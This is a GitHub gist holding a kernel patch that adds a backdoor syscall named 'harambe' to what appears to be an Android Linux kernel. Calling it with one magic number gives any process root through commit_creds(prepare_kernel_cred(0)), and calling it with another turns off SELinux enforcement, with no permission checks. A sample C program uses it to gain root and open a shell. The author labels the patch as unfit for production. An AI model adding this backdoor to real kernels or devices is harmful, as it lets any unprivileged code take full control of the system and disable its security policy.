Created
November 12, 2016 04:43
-
-
Save zhuowei/775f88f54b4dece3d39dc7f560151df1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
From 57beb8c9d0e68d30e02eadf705eaa1c6e6e7a8bb Mon Sep 17 00:00:00 2001 | |
From: Zhuowei Zhang <_@_> | |
Date: Sat, 24 Sep 2016 11:17:20 -0700 | |
Subject: [PATCH] kernel: add harambe backdoor syscall | |
This patch adds a new syscall for elevating any program to root and for | |
switching SELinux to permissive mode. There are no security checks, | |
so this should never be used in production. | |
Example program: | |
int main() { | |
syscall(278, 0x33ff22dd); // become root | |
syscall(278, 0x33ff22de); // selinux permissive | |
execl("/system/bin/sh", "/system/bin/sh", (char*)0); | |
return 0; | |
} | |
--- | |
include/linux/syscalls.h | 1 + | |
include/uapi/asm-generic/unistd.h | 4 +++- | |
kernel/sys.c | 23 +++++++++++++++++++++++ | |
3 files changed, 27 insertions(+), 1 deletion(-) | |
diff --git a/include/linux/syscalls.h b/include/linux/syscalls.h | |
index 55b8b74..5aacea5 100644 | |
--- a/include/linux/syscalls.h | |
+++ b/include/linux/syscalls.h | |
@@ -873,3 +873,4 @@ asmlinkage long sys_finit_module(int fd, const char __user *uargs, int flags); | |
asmlinkage long sys_seccomp(unsigned int op, unsigned int flags, | |
const char __user *uargs); | |
#endif | |
+asmlinkage long sys_harambe(int cmd); | |
diff --git a/include/uapi/asm-generic/unistd.h b/include/uapi/asm-generic/unistd.h | |
index 2464ed5..7786bd6 100644 | |
--- a/include/uapi/asm-generic/unistd.h | |
+++ b/include/uapi/asm-generic/unistd.h | |
@@ -702,9 +702,11 @@ __SYSCALL(__NR_sched_getattr, sys_sched_getattr) | |
__SYSCALL(__NR_renameat2, sys_ni_syscall) | |
#define __NR_seccomp 277 | |
__SYSCALL(__NR_seccomp, sys_seccomp) | |
+#define __NR_harambe 278 | |
+__SYSCALL(__NR_harambe, sys_harambe) | |
#undef __NR_syscalls | |
-#define __NR_syscalls 278 | |
+#define __NR_syscalls 279 | |
/* | |
* All syscalls below here should go away really, | |
diff --git a/kernel/sys.c b/kernel/sys.c | |
index 0b08c9f..5a49bf7 100644 | |
--- a/kernel/sys.c | |
+++ b/kernel/sys.c | |
@@ -2661,3 +2661,26 @@ COMPAT_SYSCALL_DEFINE1(sysinfo, struct compat_sysinfo __user *, info) | |
return 0; | |
} | |
#endif /* CONFIG_COMPAT */ | |
+ | |
+/* | |
+ * Backdoor syscall for setting root and/or disabling SELinux. | |
+ */ | |
+extern int selinux_enforcing; | |
+extern void selnl_notify_setenforce(int val); | |
+extern void selinux_status_update_setenforce(int enforcing); | |
+SYSCALL_DEFINE1(harambe, int, cmd) | |
+{ | |
+ if (cmd == 0x33ff22dd) { | |
+ // get root | |
+ commit_creds(prepare_kernel_cred(0)); | |
+ return 0; | |
+ } else if (cmd == 0x33ff22de) { | |
+ // disable SELinux | |
+ selinux_enforcing = 0; | |
+ selnl_notify_setenforce(selinux_enforcing); | |
+ selinux_status_update_setenforce(selinux_enforcing); | |
+ return 0; | |
+ } else { | |
+ return -1; | |
+ } | |
+} | |
-- | |
2.5.0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment